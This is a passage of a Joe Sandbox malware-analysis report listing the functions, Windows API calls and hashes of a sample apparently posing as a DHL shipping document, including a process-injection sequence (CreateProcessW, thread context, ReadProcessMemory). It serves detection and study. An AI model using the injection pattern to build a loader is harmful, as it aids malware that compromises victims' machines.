                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1505330794-0
                                                                                    • Opcode ID: ca0864c37a490fcfb82446d4b988026ffabc937273debf1414741e70d920e98e
                                                                                    • Instruction ID: 134baadcb4fc6f254c78fa66123f508da86b2b9f7a007a018233ea50a3896aee
                                                                                    • Opcode Fuzzy Hash: ca0864c37a490fcfb82446d4b988026ffabc937273debf1414741e70d920e98e
                                                                                    • Instruction Fuzzy Hash: 653150B0505701DFD721DF24D8887DBBBF8FB58308F00092EE69A93252D7B5A984CB92
                                                                                    Function 007D571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __FF_MSGBANNER.LIBCMT ref: 007D5733
                                                                                      • Part of subcall function 007DA16B: __NMSG_WRITE.LIBCMT ref: 007DA192
                                                                                      • Part of subcall function 007DA16B: __NMSG_WRITE.LIBCMT ref: 007DA19C
                                                                                    • __NMSG_WRITE.LIBCMT ref: 007D573A
                                                                                      • Part of subcall function 007DA1C8: GetModuleFileNameW.KERNEL32(00000000,008733BA,00000104,?,00000001,00000000), ref: 007DA25A
                                                                                      • Part of subcall function 007DA1C8: ___crtMessageBoxW.LIBCMT ref: 007DA308
                                                                                      • Part of subcall function 007D309F: ___crtCorExitProcess.LIBCMT ref: 007D30A5
                                                                                      • Part of subcall function 007D309F: ExitProcess.KERNEL32 ref: 007D30AE
                                                                                      • Part of subcall function 007D8B28: __getptd_noexit.LIBCMT ref: 007D8B28
                                                                                    • RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,007D0DD3,?), ref: 007D575F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 1372826849-0
                                                                                    • Opcode ID: c5da099c6a9d67ce2677fcb2c1fc7c0e598e670d762691c8654c9f79f481d649
                                                                                    • Instruction ID: e26eb84a2f927c1caf7b6d23fafe186d47fea44daea3b3e744167222357be799
                                                                                    • Opcode Fuzzy Hash: c5da099c6a9d67ce2677fcb2c1fc7c0e598e670d762691c8654c9f79f481d649
                                                                                    • Instruction Fuzzy Hash: E501F171200B11EBD6102739EC8AB2E77B8AB82372F200427F5199A382DF7CCC408662
                                                                                    Function 008198A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00819548,?,?,?,?,?,00000004), ref: 008198BB
                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00819548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008198D1
                                                                                    • CloseHandle.KERNEL32(00000000,?,00819548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008198D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 3397143404-0
                                                                                    • Opcode ID: 366650ba7f7066445d03019b86aca6c6cf5b382ad71f857efd137e4f36fb8204
                                                                                    • Instruction ID: e7b9dd3c350d070c001721360f2d0c5d9e61e10d3bbb01f705183131ec3ffedd
                                                                                    • Opcode Fuzzy Hash: 366650ba7f7066445d03019b86aca6c6cf5b382ad71f857efd137e4f36fb8204
                                                                                    • Instruction Fuzzy Hash: 16E08632540214B7D7221B54EC09FDE7B59FB46760F104620FB54A90E187B1251197D8
                                                                                    Function 00818D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00818D1B
                                                                                      • Part of subcall function 007D2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007D9A24), ref: 007D2D69
                                                                                      • Part of subcall function 007D2D55: GetLastError.KERNEL32(00000000,?,007D9A24), ref: 007D2D7B
                                                                                    • _free.LIBCMT ref: 00818D2C
                                                                                    • _free.LIBCMT ref: 00818D3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                    • Instruction ID: 7f3ec2af3076c00c2952e1164b8e8e99f3f530c4db6a71e43878615d4f27b16d
                                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                    • Instruction Fuzzy Hash: 0CE012A1701701C6DB24A578B945AD313ED9F69352714091EB40DD7287CE68F8C38124
                                                                                    Function 007BA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CALL
                                                                                    • API String ID: 0-4196123274
                                                                                    • Opcode ID: 82935a85b1a01679d2b450ddc3a23280c0ad2c7010d92c68e5f1df93708c5bb8
                                                                                    • Instruction ID: 81db28f17fb3fc60b83cd344f55a7cc71ab2baa4b89560108eb29d13629da2db
                                                                                    • Opcode Fuzzy Hash: 82935a85b1a01679d2b450ddc3a23280c0ad2c7010d92c68e5f1df93708c5bb8
                                                                                    • Instruction Fuzzy Hash: E1224A70608241DFC724EF24C494BAABBE1FF45304F14896DE99A8B362D779EC45CB92
                                                                                    Function 007B4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: EA06
                                                                                    • API String ID: 4104443479-3962188686
                                                                                    • Opcode ID: 6ec013ef942e97bff0fb2d0215ab713c735ee88fa23cf67a8b8ba3ade43d0af6
                                                                                    • Instruction ID: a68d5530ae6160a2c0752686d4a5ffe552ce30634efaf94a9bae2a7484d321d8
                                                                                    • Opcode Fuzzy Hash: 6ec013ef942e97bff0fb2d0215ab713c735ee88fa23cf67a8b8ba3ade43d0af6
                                                                                    • Instruction Fuzzy Hash: E9413762B04258ABDF229B64C8657FE7FB2DB45300F684465EA82DB287D63C9D4483A1
                                                                                    Function 007B7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                    • Instruction ID: e0cb8cac35d14140fefa6a389b98df44c543f32c9304b2097ee6141ef20ecce1
                                                                                    • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                    • Instruction Fuzzy Hash: 3F3175B1604506AFC748DF6CC8D1EA9B7A5FF88310B15C62AE519CB391EB34E950CB90
                                                                                    Function 007B47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsThemeActive.UXTHEME ref: 007B4834
                                                                                      • Part of subcall function 007D336C: __lock.LIBCMT ref: 007D3372
                                                                                      • Part of subcall function 007D336C: DecodePointer.KERNEL32(00000001,?,007B4849,00807C74), ref: 007D337E
                                                                                      • Part of subcall function 007D336C: EncodePointer.KERNEL32(?,?,007B4849,00807C74), ref: 007D3389
                                                                                      • Part of subcall function 007B48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007B4915
                                                                                      • Part of subcall function 007B48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B492A
                                                                                      • Part of subcall function 007B3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007B3B68
                                                                                      • Part of subcall function 007B3B3A: IsDebuggerPresent.KERNEL32 ref: 007B3B7A
                                                                                      • Part of subcall function 007B3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,008752F8,008752E0,?,?), ref: 007B3BEB
                                                                                      • Part of subcall function 007B3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 007B3C6F
                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B4874
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                    • String ID:
                                                                                    • API String ID: 1438897964-0
                                                                                    • Opcode ID: 9eba87be61b9953f60439acb4a35597cab22bcf178408f6f7b7e7d3e7b700fbe
                                                                                    • Instruction ID: bef22de479e3ec958ec1b30292aeeaa02401f21db49e4c65cfc48900e00be268
                                                                                    • Opcode Fuzzy Hash: 9eba87be61b9953f60439acb4a35597cab22bcf178408f6f7b7e7d3e7b700fbe
                                                                                    • Instruction Fuzzy Hash: 0F119D719187419FC700EF28EC09A4ABBE8FF85750F10491EF158832B2DBB4D584CB92
                                                                                    Function 007D0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007D571C: __FF_MSGBANNER.LIBCMT ref: 007D5733
                                                                                      • Part of subcall function 007D571C: __NMSG_WRITE.LIBCMT ref: 007D573A
                                                                                      • Part of subcall function 007D571C: RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,007D0DD3,?), ref: 007D575F
                                                                                    • std::exception::exception.LIBCMT ref: 007D0DEC
                                                                                    • __CxxThrowException@8.LIBCMT ref: 007D0E01
                                                                                      • Part of subcall function 007D859B: RaiseException.KERNEL32(?,?,?,00869E78,00000000,?,?,?,?,007D0E06,?,00869E78,?,00000001), ref: 007D85F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 3902256705-0
                                                                                    • Opcode ID: a03a2571edd16cd0f708d2d78cee476a2f9d0acdf3d0194d16d0f03513ea12f6
                                                                                    • Instruction ID: 9d186f3ecc1ab9edd74f64f50295a1c7a612b48df6e76b1e3113f4d8de3b4c93
                                                                                    • Opcode Fuzzy Hash: a03a2571edd16cd0f708d2d78cee476a2f9d0acdf3d0194d16d0f03513ea12f6
                                                                                    • Instruction Fuzzy Hash: 84F0813190421DA6CB10BAA4EC09BDE7BBCEF01315F10142BF91496381DFB99A54D6E2
                                                                                    Function 007D53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007D8B28: __getptd_noexit.LIBCMT ref: 007D8B28
                                                                                    • __lock_file.LIBCMT ref: 007D53EB
                                                                                      • Part of subcall function 007D6C11: __lock.LIBCMT ref: 007D6C34
                                                                                    • __fclose_nolock.LIBCMT ref: 007D53F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2800547568-0
                                                                                    • Opcode ID: 210cc0f46d42345ae185daa763994a9f67db8347dcd8000f3f021a388c3fdc9a
                                                                                    • Instruction ID: dc093d77f21778f00e427206f6ae980e35f43c1db0a3dbd3961380482798f63d
                                                                                    • Opcode Fuzzy Hash: 210cc0f46d42345ae185daa763994a9f67db8347dcd8000f3f021a388c3fdc9a
                                                                                    • Instruction Fuzzy Hash: 03F09071900A04DBDB50AB65980A7AD7BB06F41378F25820BA464AB3C1CBBC99419B63
                                                                                    Function 0149B8D5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 0149C093
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0149C129
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0149C14B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_149a000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                    • Instruction ID: 436ec315c218a0e06da86934b4f1148ac3f0f6a66b1c878542758aa6af36af38
                                                                                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                    • Instruction Fuzzy Hash: 8112DE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                    Function 007D0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction ID: 1ae2918f94a5901b7464c9bcd607a30ae563cd7d6a68ce4e8a0741a1e4216bf2
                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction Fuzzy Hash: A031C070A101059BC718DF59C484AA9FBB6FB59300F64A6A6E80ACB351DA35EDC1DBE0
                                                                                    Function 007EFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: ffe16420d12b33bfe6feebc9a63eae478b8631235425838851f1513cf4f8c3cc
                                                                                    • Instruction ID: 1e09f2c9e32aad498ba927e0f115365526c1fad8b7b4d5083492ad91038209f8
                                                                                    • Opcode Fuzzy Hash: ffe16420d12b33bfe6feebc9a63eae478b8631235425838851f1513cf4f8c3cc
                                                                                    • Instruction Fuzzy Hash: 32412774604341DFDB24DF24C448B6ABBE0BF49314F0988ACE9998B762C379E845CF92
                                                                                    Function 007B7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: 25bcc02bd89e9a4a610af589ad8e3e5c34fe3acebb2ca2f2933fef76095e5b4b
                                                                                    • Instruction ID: ff929643694c26a9e0e3c89f95b206d9ed29e8246a923a97107860b31375c4d4
                                                                                    • Opcode Fuzzy Hash: 25bcc02bd89e9a4a610af589ad8e3e5c34fe3acebb2ca2f2933fef76095e5b4b
                                                                                    • Instruction Fuzzy Hash: 0F216AB2604A08EBDB148F26EC417AE7BB8FF58350F31886EE486C51A0EB74C1D0DB55
                                                                                    Function 007B4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 007B4BEF
                                                                                      • Part of subcall function 007D525B: __wfsopen.LIBCMT ref: 007D5266
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4E0F
                                                                                      • Part of subcall function 007B4B6A: FreeLibrary.KERNEL32(00000000), ref: 007B4BA4
                                                                                      • Part of subcall function 007B4C70: _memmove.LIBCMT ref: 007B4CBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1396898556-0
                                                                                    • Opcode ID: 6114fef936412b7548d0fced036c3cf4083d1a7d70ddb731c4cdd56019a72b91
                                                                                    • Instruction ID: f31e4df7cf28180df2c1b929e46c48845a83cba2e9dca34481e40bbae69a0afe
                                                                                    • Opcode Fuzzy Hash: 6114fef936412b7548d0fced036c3cf4083d1a7d70ddb731c4cdd56019a72b91
                                                                                    • Instruction Fuzzy Hash: DE119131600205EBCF25AF75CC1AFEE77A9AF84750F108829F641E7183DA799A059B91
                                                                                    Function 007EFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: 8f051f19701f9961569c30331217e248724423608df507907a8e6b312903c34c
                                                                                    • Instruction ID: 99ea0a8a736c606af39065e9d8debdd38521259c6321b2ac11fd96b78a8365da
                                                                                    • Opcode Fuzzy Hash: 8f051f19701f9961569c30331217e248724423608df507907a8e6b312903c34c
                                                                                    • Instruction Fuzzy Hash: FB21F574A08341DFCB14EF64C444B5ABBE1BF88314F05896CE99A57722D739E809DB92
                                                                                    Function 007B7DE1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
